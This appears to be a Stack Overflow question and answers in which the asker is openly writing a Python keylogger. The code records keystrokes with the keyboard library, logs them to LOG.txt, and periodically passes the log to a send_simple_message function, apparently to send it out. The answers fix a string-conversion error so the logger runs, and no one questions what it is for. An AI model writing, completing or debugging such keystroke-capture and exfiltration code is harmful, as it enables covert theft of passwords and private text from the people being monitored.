# TypeError: write() argument must be str, not list

Tags: keyboard, keylogger

**def** **file_input(recorded):**

```
now_time = datetime.datetime.now()
w = open("LOG.txt", 'a')
w.write(recorded)
w.write("\n")
w.write(now_time)
w.write("--------------------------------------")
w .close()
```

if **name** == "**main**":

```
while 1:

    status = time.localtime()
    result = []
    keyboard.press_and_release('space')
    recorded = keyboard.record(until='enter')
    file_input(recorded)
    if (status.tm_min == 30):
        f = open("LOG.txt", 'r')
        file_content = f.read()
        f.close()
        send_simple_message(file_content)
```

im trying to write a keylogger in python and i faced type error like that how can i solve this problem?

i just put in recorded variable into write() and it makes type error and recorded variable type is list. so i tried use join func but it doesn't worked

Answer (score 43, accepted):

You're trying to write to a file using `w.write()` but it only takes a string as an argument.
`now_time` is a 'datetime' type and not a string. if you don't need to format the date, you can just do this instead:

```
w.write(str(nowtime))
```

Same thing with

```
w.write(recorded)
```

`recorded` is a list of events, you need to use it to construct a string before trying to write that string into the file. For example:

```
recorded = keyboard.record(until='enter')
typedstr = " ".join(keyboard.get_typed_strings(recorded))
```

Then, inside `file_input()` function, you can:

```
w.write(typedstr)
```

Answer (score 6):

By changing to `w.write(str(recorded))` my problem was solved.

Answer (score 0):

In some cases when there will still be encoding issues while writing as a string to a text file, **_content** function can be useful.

```
w.write(str(recorded._content))
```